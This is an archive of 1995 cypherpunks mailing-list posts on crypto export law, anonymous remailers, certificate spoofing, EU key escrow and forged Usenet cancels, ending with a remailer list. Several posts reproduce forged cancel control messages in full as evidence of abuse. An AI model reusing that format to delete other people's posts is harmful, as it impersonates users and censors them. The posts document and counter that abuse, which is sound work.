[...]
> communications problems, their fear of RSA Labs, new Belgian
> export controls they haven't tried to work with yet, and their
> belief that I need a US crypto import license, which I can't persuade
> anyone to admit _exists_.

There is no such animal under US law.  Note however (1) you need export
permission to re-export the import, just as if it was produced here; (2)
the company may have legitimate fears that it may have liability and/or
bad PR with the feds under either US or Belgian law if you attempt a
re-export; (3) For all I know, Belgian law may require some US paper
showing what you will do with the stuff before they are allowed to export
it. 

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | 
U. Miami School of Law     | froomkin@law.miami.edu
P.O. Box 248087            | http://www.law.miami.edu/~froomkin
Coral Gables, FL 33124 USA | New address, but it's still just as hot here.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 1 Oct 95 22:00:58 PDT
To: cypherpunks@toad.com
Subject: Restrictions on Munitions _Imports_
Message-ID: <ac94bc7800021004cb78@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 1:58 AM 10/2/95, Michael Froomkin wrote:
>On Thu, 28 Sep 1995, Douglas Barnes wrote:
>[...]
>> communications problems, their fear of RSA Labs, new Belgian
>> export controls they haven't tried to work with yet, and their
>> belief that I need a US crypto import license, which I can't persuade
>> anyone to admit _exists_.
>
>There is no such animal under US law.  Note however (1) you need export
>permission to re-export the import, just as if it was produced here; (2)

I don't expect that any specific _crypto_ import licenses exist, but
certainly various kinds of _munitions_ import licenses exist (improperly,
in my opinion, of course).

Specifically, importers of guns must have licenses. And not just because of
local laws, as the Feds (U.S. Customs, BATF) get involved in seizures of
ammunition, clips, guns, etc. (A recent case here in the Bay Area involved
the highly publicized seizure of some large number of crates of Chinese or
Russian 7.39 mm ammo...it was alleged that improper licenses had been
gotten, or had been forged, or some other such crime. After Feinswine got
her media attention, calling the imports "shocking," it was later admitted
that the warehouse contents were duly licensed and the news was carried on
page C23 that the importers were kosher.

(As with most laws, a welter of competing laws are involved. The Gun
Control Act of 1968 is involved, as is the McClure-Volkmer Act, etc. And
during the recent anti-gun hysteria, new laws were passed about the
importation of ammunition, clips, etc.)

As far as other munitions go, try "importing" a French Exocet, a Russian
Strelka, or any number of other "munitions" items.

Given that crypto is classified as "munitions" for the purpose of export
control (including the ITARs), it would not surprise me in the least if the
same sorts of restrictions on imports of the aforementioned munitions are
not applied to at least some crypto imports. If not now, soon. (Given that
many folks are talking about a strategy that has been apparent for many
years: develop core crypto in less hostile environments than the U.S.)

I can't cite a specific law affecting crypto imports at this time--and I
doubt any crypto products have been affected so far--but clearly there are
restricitions on imports of ammunition, guns, missiles, jet fighters,
and--maybe soon--on "crypto munitions."

--Tim May


---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 1 Oct 95 22:17:33 PDT
To: cypherpunks@toad.com
Subject: The Free Speech Implications of Remailers
Message-ID: <ac94c16801021004f486@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



I've seen a bunch of messages in this group, and on Usenet, about what can
be done to track down and punish (or otherwise stop) the posters of racist,
fascist, inflammatory posts. This in light of several recent widespread
postings of racist screeds. People are doing traceroute analyses, asking
what can be done, proposing to sue those who send them unwanted spewage,
etc.

Well, guess what? The very technologies we have been so central in
deploying are the technologies that make _conventional_ means of
controlling distasteful material so hard.

Think about it. Remailers mean the people whose speech we abhor will be
untraceable. (I of course mean Chaum-style mixes, and ecologies of mixes,
not the "almost mixes" we have now, where a motivated operator can screen
posts, stop spams, etc.)

All is not lost, in the long run, as "digital postage" schemes may develop.
This will reduce Net-wide spamming, though not have an effect on a lot of
"distasteful" speech. In that regard, reputation filters will help. A
person could insist that he will only read messages from persons or nyms he
knows.

(Sure, it doesn't stop the problem of the _mail volume_ itself, but first
things first. The current delivery paradigm is unlike the paid-transport
system of the various mail delivery systems.)

Crypto anarchy means the racists, sexists, speciesists, and other "ists"
cannot be muzzled. I call this a good thing. It's why I'm here.

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Gilmore <gnu@toad.com>
Date: Sun, 1 Oct 95 23:01:58 PDT
To: cypherpunks
Subject: Bryn Mawr talk TODAY on Enigma and Its Effect on the Computing Age
Message-ID: <9510020601.AA18855@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Forwarded-by: Dave Farber <farber@central.cis.upenn.edu> and "Steven"

Bi-Co Mathematics Talk Series at Bryn Mawr College

Charles Terry: "The Cryptography of the Enigma Machine and Its Effect on
the Computing Age"

Monday, October 2, 1995, Talk at 4pm in room 338, Tea at 3:30 in room 355
Bryn Mawr College, Park Science Center
------------------------------

Steven

P.S. I was told he obtained permission to bring an authentic machine to the
talk and will demonstrate it's operation afterwards.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jbyrd@tiac.net (Jim Byrd)
Date: Sun, 1 Oct 95 17:16:31 PDT
To: cypherpunks@toad.com
Subject: More forged cancels
Message-ID: <44n926$2dj@sundog.tiac.net>
MIME-Version: 1.0
Content-Type: text/plain


These were found in control.  Note that they all have the string
"CANCELLED", and all are timestamped 17:56.

The first one is definitely forged.  The others look like they
probably are.  I asked Jukka Santala, and he didn't issue that
forgery.  I asked Joel Rubin, and haven't gotten a response yet.
I haven't asked the other people yet.

So I'll go ahead and post this, crossposted to the affected groups.

It looks like the Cancelschnauzer is hitting lots of groups.

A note to the canceller:  if you try to cancel this, I'll just put it
back.

-----------------begin control message
Path:
sundog.tiac.net!news.sprintlink.net!in2.uu.net!sunic!mn6.swip.net!seunet!news2..swip..net!plug..ne
ws.pipex.net!pipex!tank.news.pipex.net!pipex!usenet.eel.ufl.edu!news.gmi..edu!msunews!netnew
s.upenn.edu!ts7-28.upenn.edu!user
From: 73323.603@compuserve.com
Newsgroups: soc.culture.german,soc.culture.jewish
Subject: cmsg cancel <73323.603-3009951517290001@ts7-28.upenn.edu>
Date: Sun, 1 Oct 1995 17:56 GMT
Organization: The National Alliance
Message-ID: <cancel.73323.603-3009951517290001@ts7-28.upenn.edu>
NNTP-Posting-Host: ts7-28.upenn.edu
Approved: 73323.603@compuserve.com
Control: cancel <73323.603-3009951517290001@ts7-28.upenn.edu>
X-Cancelled-By: 73323.603@compuserve.com
Lines: 1

CANCELLED.

----end control message

These others are suspicious, the Santala cancel is definitly forged.
I don't have the original posts of any of these, I suspect they are
all related to National Alliance.

------------rest of the cancels:
Path:
sundog.tiac.net!news.kei.com!news.mathworks.com!tank.news.pipex.net!pipex!in2..uu..net!howla
nd.reston.ans.net!ix.netcom.com!netnews
From: jmrubin@ix.netcom.com (Joel Rubin)
Newsgroups:
soc.culture.german,soc.culture.jewish,rec.radio.shortwave,alt.2600
Subject: cmsg cancel <44lfpn$qoh@ixnews7.ix.netcom.com>
Date: Sun, 1 Oct 1995 17:56 GMT
Organization: Netcom
Message-ID: <cancel.44lfpn$qoh@ixnews7.ix.netcom.com>
NNTP-Posting-Host: ix-sf17-08.ix.netcom.com
Approved: jmrubin@ix.netcom.com (Joel Rubin)
Control: cancel <44lfpn$qoh@ixnews7.ix.netcom.com>
X-Cancelled-By: jmrubin@ix.netcom.com (Joel Rubin)
Lines: 1

CANCELLED.

========
Path:
sundog.tiac.net!news.sprintlink.net!in2.uu.net!sun4nl!xs4all!mail
From: nobody@alpha.c2.org (Anonymous)
Newsgroups:
mail.cypherpunks,alt.privacy.anon-server,alt.2600,alt.stop.spamming,alt..stop-
spamming
Subject: cmsg cancel <199510010427.VAA28730@infinity.c2.org>
Date: Sun, 1 Oct 1995 17:56 GMT
Organization: Mail to Usenet Gateway at Utopia
Message-ID: <cancel.199510010427.VAA28730@infinity.c2.org>
NNTP-Posting-Host: utopia.hacktic.nl
Approved: nobody@alpha.c2.org (Anonymous)
Control: cancel <199510010427.VAA28730@infinity.c2.org>
X-Cancelled-By: nobody@alpha.c2.org (Anonymous)
Lines: 1

CANCELLED.

========
Path:
sundog.tiac.net!news.sprintlink.net!in2.uu.net!sunic!sunic!sunic.sunet.se!news..funet..fi!zippo..uwa
sa.fi!!jsantala
From: jsantala@walli.uwasa.fi (Jukka Santala)
Newsgroups: alt.2600,news.admin.net-abuse.misc
Subject: cmsg cancel <tlqbws0p37xU084yn@walli.uwasa.fi>
Date: Sun, 1 Oct 1995 17:56 GMT
Organization: And you think we're organized?
Message-ID: <cancel.tlqbws0p37xU084yn@walli.uwasa.fi>
NNTP-Posting-Host: walli.uwasa.fi
Approved: jsantala@walli.uwasa.fi (Jukka Santala)
Control: cancel <tlqbws0p37xU084yn@walli.uwasa.fi>
X-Cancelled-By: jsantala@walli.uwasa.fi (Jukka Santala)
Lines: 1

CANCELLED.

========
Path:
sundog.tiac.net!news.texas.net!newshost.comco.com!news.tamu.edu!news.utdallas..edu!news01..
aud.alcatel.com!gatech!news.mathworks.com!zombie.ncsc.mil!simtel!news.sprintlink..net!in2..uu..
net!sunic!mn6.swip.net!seunet!news2.swip.net!plug.news.pipex.net!pipex!tank..news..pipex..net!pi
pex!news1.digital.com!nntp-hub2.barrnet.net!nntp-ucb.barrnet.net!well!usenet
From: themed@well.com
Newsgroups: alt.2600
Subject: cmsg cancel <44mknk$1m0@nkosi.well.com>
Date: Sun, 1 Oct 1995 17:56 GMT
Organization: The Whole Earth 'Lectronic Link, Sausalito, CA
Message-ID: <cancel.44mknk$1m0@nkosi.well.com>
NNTP-Posting-Host: sf-tty7-ppp.well.com
Approved: themed@well.com
Control: cancel <44mknk$1m0@nkosi.well.com>
X-Cancelled-By: themed@well.com
Lines: 1

CANCELLED.

========






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Mon, 2 Oct 95 00:37:33 PDT
To: Greg Miller <gmiller@grendel.ius.indiana.edu>
Subject: Re: Spoofing HTTP server certificates
Message-ID: <199510020737.AAA27256@ix7.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:52 AM 10/2/95 -0400, Greg Miller <gmiller@grendel.ius.indiana.edu> wrote:
>	Since there has been a lot of talk about the "man in the middle" 
>attack on the secure web servers, has anyone actually considered the 
>processing time required to fake a certificate from scratch?
>	I haven't really familiarized myself with how the certificates 
>are generated, etc, but it's my understanding that they are signed with RSA.

While I haven't seen Verisign's various public keys posted to the net,
and didn't see them anywhere on their web page, I assume they're at least
508 bits long, and the ones for better-than-personna certification
(or at least Class 3) ought to be ~1024 bits long, unless they're limiting
themselves to 512 bits to support software that's limited by ITAR stupidity
(which would be a shame, but is certainly possible.)

For the moment, breaking a 512-bit key remains hard, though maybe within the
NSA's reach.  It's probably one of the next big factoring challenges after the
RSA-130 number is taken out by the General Number Field Sieve folks.
The better fake, which is much more possible, is to build a chain of
certifications
(trivial) and convince your victim to accept them instead of the real ones 
(more doable, especially if some vendor's software isn't written carefully,
or is written carefully but requires the user to think about what he's reading.)

#---
#                                       Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ccshag@cclabs.missouri.edu (Paul 'Shag' Walmsley)
Date: Sun, 1 Oct 95 18:17:17 PDT
To: cypherpunks@toad.com
Subject: Re: WHERE did this come from?
In-Reply-To: <44kgtb$88i@news.rain.org>
Message-ID: <44ncdp$5gt@news.missouri.edu>
MIME-Version: 1.0
Content-Type: text/plain


Joel Rubin (jmrubin@ix.netcom.com) wrote:
: In article <44leli$s38@ixnews6.ix.netcom.com>, VMARX@ix.netcom.com 
: says...
: >
: >In <44kgtb$88i@news.rain.org> rivaud@rain.org writes: 
: >>
: >>This is a multi-part message in MIME format.
: >>
: >>---------------------------------17921121372935
: >>Content-Transfer-Encoding: 7bit
: >>Content-Type: text/plain; charset=us-ascii
: >>
: >>Attatched to this is, (I hope), the header text from a unsolicited
: >e-mail 
: >>message I received.  The return address does not work.  WHY? How can I
: >
: >>inform the sender that I hope to never receive there material again?
: >>
: >>I tried "reply-all" through Eudora, but my reply got bounced back to
: >me 
: >>as undeliverable.
: >>
: >>I have removed the content of the original message. I don't know why
: >it 
: >>was sent to me, but it contained material that I found offensive.
: >>
: >>Any help, or words of wisdom and enlightenment would be appreciated. 
: >>Information would be nice too.  
: >>
: >
: >I got the SAME dammed letter.  I don't know who the facist bastard is
: >that sent it to me, but I sent him a reply ALSO telling him to stop
: >sending it to me (he sent me 3 copies) and I couldn't connect to his
: >server.
: >

: I don't know if this is connected but I notice that a "let's use these 
: big lie tactics on Usenet" posting allegedly from the National 
: Alliance's Compuserve address seems to have somehow gone through the 
: University of Pennsylvania.

:      "Things are seldom what they seem.
:       Skim milk masquerades as cream."

The E-mails seem to be coming from different sendmails; the copy I got
supposedly originated from slip-1.slip.net and bounced through a few
French sites.  Perhaps s/he's hedging their bets?


--

- Paul "Shag" Walmsley <ccshag@cclabs.missouri.edu>
  "Praise and blame alike mean nothing." -- Virginia Woolf




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Miller <gmiller@grendel.ius.indiana.edu>
Date: Sun, 1 Oct 95 21:40:33 PDT
To: cypherpunks@toad.com
Subject: Spoofing HTTP server certificates
Message-ID: <Pine.3.89.9510020002.A7800-0100000@grendel.ius.indiana.edu>
MIME-Version: 1.0
Content-Type: text/plain



	Since there has been a lot of talk about the "man in the middle" 
attack on the secure web servers, has anyone actually considered the 
processing time required to fake a certificate from scratch?
	I haven't really familiarized myself with how the certificates 
are generated, etc, but it's my understanding that they are signed with RSA.

	The few recent factorings of RSA keys have shown that brute force 
attacks are feasable with distributed processing.  Since these projects 
were done "just for the fun of it", wouldn't it seem likley that someone 
(or some people) would take the time and effort to factor the certificate 
signing key?  After all, it would actually be worth something.

gmiller@grendel.ius.indiana.edu
http://www.ius.indiana.edu/~gmiller/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Sun, 1 Oct 95 22:16:19 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: User-Specified Trusted CAs in Netscape (Was: Re: NetScape's dependence upon RSA down for the count!)
In-Reply-To: <199510012043.NAA06905@illilouette.Eng.Sun.COM>
Message-ID: <199510020516.BAA21934@giane.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Bill Soley writes:
> (3) Netscape is making the problem worse (yes, worse) in the next release
> by allowing the user to specify their own list of trusted CAs.  (I will
> elaborate on this unpopular view below.)
[...]
> Re: problem 3, about how allowing the user to specify their own list of
> trusted CAs is bad.  
[...]
> it.  Even Mary Moderately-Savy might be tricked in to doing it on the
> false assumption that it would only affect security for the naughty
> pictures site (that she may not care about), and not affect security for
> her stock-broker.  This false assumption might be based on the fact
> that the (legitimate) stock-broker uses a different CA.

You seem to be overstating your point a bit. The real problem here, AFAICS,
is that the proposed protocol in the software wouldn't allow sufficiently 
fine-grained control over the certification authority approval. The user
should be able to specify the conditions under which a CA is to be trusted,
not simply give a blanket approval or rejection. 

It looks as though a set of trusted (CA, site) pairs would suffice. 
How about it, Netscape ?  Give the user the opportunity to say "I trust 
certificates from Alfie's World of Key Certification regarding keys for
interactions with Elvira's Copier Shack."

-Futplex <futplex@pseudonym.com>



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Sun, 1 Oct 95 22:26:39 PDT
To: owner-cypherpunks@toad.com
Subject: Re: Crypto hardware (was: Using sound cards to accelerate RSA?)
Message-ID: <9510020525.AA08599@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


>> belief that I need a US crypto import license, which I can't persuade

>There is no such animal under US law.  Note however (1) you need export

Perhaps they're worried about contributing to patent infringement?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tatu Ylonen <ylo@cs.hut.fi>
Date: Sun, 1 Oct 95 17:05:45 PDT
To: cypherpunks@toad.com
Subject: Re: DNS Security ( was Re: NetScape's dependence upon RSA down...)
In-Reply-To: <Pine.SUN.3.91.951001135411.12454J-100000@cybercash.com>
Message-ID: <199510020005.CAA26574@shadows.cs.hut.fi>
MIME-Version: 1.0
Content-Type: text/plain


> For information on how to acquire TIS/DNSSEC retrieve the file
> /pub/DNSSEC/README on the host ftp.tis.com via anonymous FTP.

Does anyone know if this is available outside the United States?  If
it is, please let me know.  I'd like add a link to it from the WWW
pages at http://www.cs.hut.fi/crypto.

    Tatu Ylonen <ylo@cs.hut.fi>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Rosenberg" <hal9001@panix.com>
Date: Sun, 1 Oct 95 23:19:01 PDT
To: rivaud@rain.org
Subject: Re: WHERE did this come from?
Message-ID: <v02130505ac9508c98b3e@[166.84.254.3]>
MIME-Version: 1.0
Content-Type: text/plain


At 18:38 9/30/95, rivaud@rain.org wrote:
>Attatched to this is, (I hope), the header text from a unsolicited e-mail
>message I received.  The return address does not work.  WHY? How can I
>inform the sender that I hope to never receive there material again?
>
>I tried "reply-all" through Eudora, but my reply got bounced back to me
>as undeliverable.
>
>I have removed the content of the original message. I don't know why it
>was sent to me, but it contained material that I found offensive.
>
>Any help, or words of wisdom and enlightenment would be appreciated.
>Information would be nice too.
>
>Thanks.

This is a KNOWN SPAM (it is currently being talked about in the Net-SPAM
Usenet Newsgroup). It has been coming from 3 sites (one in Italy, one in
France, and one in Germany). The national Police in all 3 countries (as
well as the FBI) are apparently investigating it. To track the situation
monitor this Web Page (Which should be Globally Accessible):

http://www.panix.com/~lan/crusader






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: grigor42@aurora.eexi.gr
Date: Sun, 1 Oct 95 18:21:15 PDT
To: cypherpunks@toad.com
Subject: Re:WHERE did this come from?
Message-ID: <199510020118.DAA26188@info.forthnet.gr>
MIME-Version: 1.0
Content-Type: text/plain


This asshole's spam reached Greece too - how do you deal with such crap?
(Yes I'm a newbie but I'm interested in crypto - so little about it reaches
my country)
Thanx
G.A.M.

+--------------------------------------------------+
| grigor42@eexi.gr         |    So long and thanks | 
| Grigoris A. Miliaresis   |     for all the fish. | 
| Athens                   |                 DNA   |
| Greece                   |                       |
|               -INFO WANTS 2 B FREE -             |
+--------------------------------------------------+





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: orbit@ix.netcom.com (Michael R. Grabois)
Date: Sun, 1 Oct 95 22:13:04 PDT
Subject: Re: More forged cancels
In-Reply-To: <44n926$2dj@sundog.tiac.net>
Message-ID: <44nmd0$q13@ixnews6.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 01 Oct 1995 23:45:24 GMT, jbyrd@tiac.net (Jim Byrd) wrote:

[snip]

>-----------------begin control message
>Path:
>sundog.tiac.net!news.sprintlink.net!in2.uu.net!sunic!mn6.swip.net!seunet!news2..swip..net!plug..ne
>ws.pipex.net!pipex!tank.news.pipex.net!pipex!usenet.eel.ufl.edu!news.gmi..edu!msunews!netnew
>s.upenn.edu!ts7-28.upenn.edu!user
>From: 73323.603@compuserve.com
>Newsgroups: soc.culture.german,soc.culture.jewish
>Subject: cmsg cancel <73323.603-3009951517290001@ts7-28.upenn.edu>
>Date: Sun, 1 Oct 1995 17:56 GMT
>Organization: The National Alliance
>Message-ID: <cancel.73323.603-3009951517290001@ts7-28.upenn.edu>
>NNTP-Posting-Host: ts7-28.upenn.edu
>Approved: 73323.603@compuserve.com
>Control: cancel <73323.603-3009951517290001@ts7-28.upenn.edu>
>X-Cancelled-By: 73323.603@compuserve.com
>Lines: 1

>CANCELLED.

>----end control message

Does this mean that the cancel came from the Compuserve account?
Forging cancel notices is definitely against CIS rules, as is
unsolicited e-mail. I've already talked to a sysop there about it, and
he said he'd pass it along to the CIS Security folks.

If nothing else, that may get his account revoked. Hey, small
victories.



        Michael R. Grabois    | orbit@ix.netcom.com
        Houston, TX           | CI$: 74737,2600
-------------------------------------------------------
    Gravity. It's not just a good idea, it's the law.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Mon, 2 Oct 95 01:11:28 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: C2 Evaluation of Win NT (was: Hack Microsoft?)
In-Reply-To: <199509260404.AAA14297@clark.net>
Message-ID: <199510020811.EAA28491@giane.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Ray writes:
>    Microsoft recently got C2-security status approved for Windows NT by
> the National Computer Security Center, a division of the NSA. 

Do you have a pointer to a source for this information ?  I've been searching
through NCSC Orange Book stuff and M$'s web server, to no avail. 
http://www.microsoft.com/BackOffice/techbriefs/tech4000.htm, the Win NT Server
3.5 Technology Brief, only says that NT was in the final evaluation phase as
of June 1995. 

I haven't been able to find on-line copies of any NCSC Product Evaluation
Bulletins, or a current Evaluated Products List. The closest I've seen is
http://www.itd.nrl.navy.mil:80/ITD/5540/xtp1/epl.html, which lists items
evaluated or under evaluation, at the A and B levels.

The status of NT's evaluation for C2 is a recurrent topic on the firewalls
list, so I'm surprised I haven't seen the final approval mentioned there.

-Futplex <futplex@pseudonym.com>



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Mon, 2 Oct 95 02:57:50 PDT
To: cypherpunks@toad.com
Subject: European Email Police (fwd)
Message-ID: <Pine.SUN.3.91.951002055654.18957A-100000@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


This may be of interest to cypherpunk folk (yanked from the UK
Electronic Telegraph:  http://www.telegraph.co.uk).

P. Madden

===============================================================

The Electronic Telegraph  Monday 2 October 1995  The Front Page


Plan to police e-mail seems certain to fail

By Adrian Berry, Science Correspondent

A EUROPEAN Commission plan to police the use of secret codes in
electronic mail appears certain to fail. To detect criminals, the
commission is seeking legal powers to prevent people from using
secret codes on the Internet which it cannot crack.

Nature magazine says this would "effectively end the Internet's
status as an unregulated medium for the free flow of
information".

The plan would require any person or company encrypting e-mail
messages to leave the "secret keys" to read them in the hands of
a law enforcement agency.

But Dr Peter Lammer, managing director of Sophos, the
Abingdon-based supplier of encryption software, said: "This plan
would never work because people wishing to evade it could
legitimately use layers of encryption.

"Suppose I send a secret file. I would first encrypt it with my
own system. I would then obey the law by encrypting it a second
time with the European-approved system.

"Even when the government agency had decrypted the message using
the keys they had been given, they would still find that the
message was totally unintelligible because of the second layer of
encryption."

In France, it is illegal to use any kind of encryption, and
police can arrest the authors of any e-mail which they cannot
understand.

Codes are used by a vast range of financial companies, sending
money orders and sensitive commercial details.


Reply to Electronic Telegraph - et@telegraph.co.uk 

Electronic Telegraph is a Registered Service Mark of The Telegraph plc 







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Mon, 2 Oct 95 04:41:22 PDT
Subject: Re: FORGED CANCELS of posts on n.a.n-a.m
In-Reply-To: <modemacDFr0qB.IyK@netcom.com>
Message-ID: <6FBccD15w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


In article <modemacDFr0qB.IyK@netcom.com>, Rt. Rev. Modemac writes:
>Dr. Dimitri Vulis (dlv@bwalk.dm.com) wrote:
>: The National Alliance are not the first despicable racist net.abusers who forge
>: cancels for other people's articles critical of them on n.a.n-a.m. Ken Arromdee
>: has condemned one such forger, the graduate student Pyotr Vorobiev from Lehigh
>: University's Mechanical Engineering and Mechanics Department (+1 610 758 4100)
>
>When Scientology began cancelling posts by their critics on
>alt.religion.scientology, Homer Wilson Smith wrote a program called
>"Lazarus" to track for cancels.  The idea is simple: whenever a cancel
>message appears, Lazarus announces it on the newsgroup.
>
>Mayhap a Lazaraus-type program can be put into effect on
>news.admin.net-abuse.misc?

Many other newsgroups are affected by such net.abuse (Vorobiev-style forged
cancels based on contents); I just saw some messages on forged cancels in
soc.culture.jewish and soc.culture.german. I think running Lazarus-like
programs in _all_ newsgroups would be an extremely Good Idea.

Alas, the time when people used to contribute their time and equipment for
the public good of the net seems to be over. Peraps I'm just dreaming; or
perhaps Dave Hayes will like the following idea enough to implement it.

Also, I think it's a matter of time before some Cancelpoodle figures to put
'light' into the Path: of its Vorobiev-style forged cancels; then they will not
be seen by lighlink.com where Lazarus now runs. This needs to be addressed.

Anyway, here are my thoughts on this proposal:

There would be a collection (at least 5 or 6) of cancel-watchers (sort of like
the deamons that now watch misc.test) all over the world. They should be
well-connected (preferrably, one hop away from sites like uunet,
howland.reston.ans.net, etc).

Each watcher would look at incoming articles in "control", and whenever it sees
a cancel, it would replace its own uucp name in the path by something like
ellipsis (to keep it confidential) and forward the cancel to a central
cataloguer (singly or in batches). E.g., is a watcher at xyzz123.uucp saw a
cancel with the header

Path: xyz123!howland.reston.ans.net!someplace

it would send it to the cataloguer with the Path: replaced by

Path: ...!howland.reston.ans.net!someplace

The cataloguer would wake up every few hours (for example), group the collected
cancels by message-ids of the cancelled articles, and e-mail reports to the
(distinct) addresses (other than "usenet@*" or "news@*") mentioned in the
"From:", "Sender:", "Authorized:", and "X-Cancelled-By:" headers, and quoting
the entire cancel and the Path's as seen at different sites by the
cancel-watchers. This way, if the cancel is forged, its author will learn
within hours that it has been fraudulently cancelled and will automatically
receive enough Path: samples from all over the world to see where it was
posted, by comparing the Path headers in several copies of cancels.

A user or an entire site should be able to "opt out" of having its cancels
reported by sending a command to the cataloguer.

There should be a limit of, say, no more than 100 such notifications sent to a
site in one batch (to prevent too much traffic in the event of really massive
forged cancellation).

I don't have the resources to do this right now, but I would be happy if some
civic-minder netters took this proposal and ran with it.

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@CS.Berkeley.EDU>
Date: Mon, 2 Oct 95 06:50:39 PDT
To: cypherpunks@toad.com
Subject: List of reliable remailers
Message-ID: <199510021350.GAA12393@kiwi.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


   I operate a remailer pinging service which collects detailed
information about remailer features and reliability.

   To use it, just finger remailer-list@kiwi.cs.berkeley.edu

   There is also a Web version of the same information, plus lots of
interesting links to remailer-related resources, at:
http://www.cs.berkeley.edu/~raph/remailer-list.html

   This information is used by premail, a remailer chaining and PGP
encrypting client for outgoing mail, which is available at:
ftp://ftp.csua.berkeley.edu/pub/cypherpunks/premail/premail-0.33.tar.gz

   For the PGP public keys of the remailers, finger
pgpkeys@kiwi.cs.berkeley.edu

This is the current info:

                                 REMAILER LIST

   This is an automatically generated listing of remailers. The first
   part of the listing shows the remailers along with configuration
   options and special features for each of the remailers. The second
   part shows the 12-day history, and average latency and uptime for each
   remailer. You can also get this list by fingering
   remailer-list@kiwi.cs.berkeley.edu.

$remailer{"extropia"} = "<remail@extropia.wimsey.com> cpunk pgp special";
$remailer{"portal"} = "<hfinney@shell.portal.com> cpunk pgp hash";
$remailer{"alumni"} = "<hal@alumni.caltech.edu> cpunk pgp hash";
$remailer{"bsu-cs"} = "<nowhere@bsu-cs.bsu.edu> cpunk hash ksub";
$remailer{"c2"} = "<remail@c2.org> eric pgp hash reord";
$remailer{"penet"} = "<anon@anon.penet.fi> penet post";
$remailer{"ideath"} = "<remailer@ideath.goldenbear.com> cpunk hash ksub reord";
$remailer{"hacktic"} = "<remailer@utopia.hacktic.nl> cpunk mix pgp hash latent cut post ek";
$remailer{"flame"} = "<remailer@flame.alias.net> cpunk mix pgp. hash latent cut post ek reord";
$remailer{"rahul"} = "<homer@rahul.net> cpunk pgp hash filter";
$remailer{"mix"} = "<mixmaster@remail.obscura.com> cpunk mix pgp hash latent cut ek ksub reord";
$remailer{"syrinx"} = "<syrinx@c2.org> cpunk pgp hash cut reord mix post";
$remailer{"ford"} = "<remailer@bi-node.zerberus.de> cpunk pgp hash ksub";
$remailer{"hroller"} = "<hroller@c2.org> cpunk pgp hash mix cut ek";
$remailer{"vishnu"} = "<mixmaster@vishnu.alias.net> cpunk mix pgp hash latent cut ek ksub reord";
$remailer{"crown"} = "<mixmaster@kether.alias.net> cpunk pgp hash latent cut mix ek reord";
$remailer{"robo"} = "<robo@c2.org> cpunk hash mix";
$remailer{"replay"} = "<remailer@replay.com> cpunk mix pgp hash latent cut post ek";
$remailer{"spook"} = "<remailer@spook.alias.net> cpunk mix pgp hash latent cut ek reord";
$remailer{"gondolin"} = "<mixmaster@gondolin.org> cpunk mix hash latent cut ek ksub reord";
$remailer{"rmadillo"} = "<remailer@armadillo.com> mix cpunk pgp hash latent cut";
$remailer{"ncognito"} = "<ncognito@gate.net> cpunk";
$remailer{"precip"} = "<mixmaster@mix.precipice.com> cpunk mix pgp hash latent cut ek reord";
$remailer{"ecafe"} = "<remail@ecafe.org> cpunk";
$remailer{"wmono"} = "<wmono@spook.alias.net> cpunk mix pgp hash latent cut ek";
catalyst@netcom.com is _not_ a remailer.
lmccarth@ducie.cs.umass.edu is _not_ a remailer.
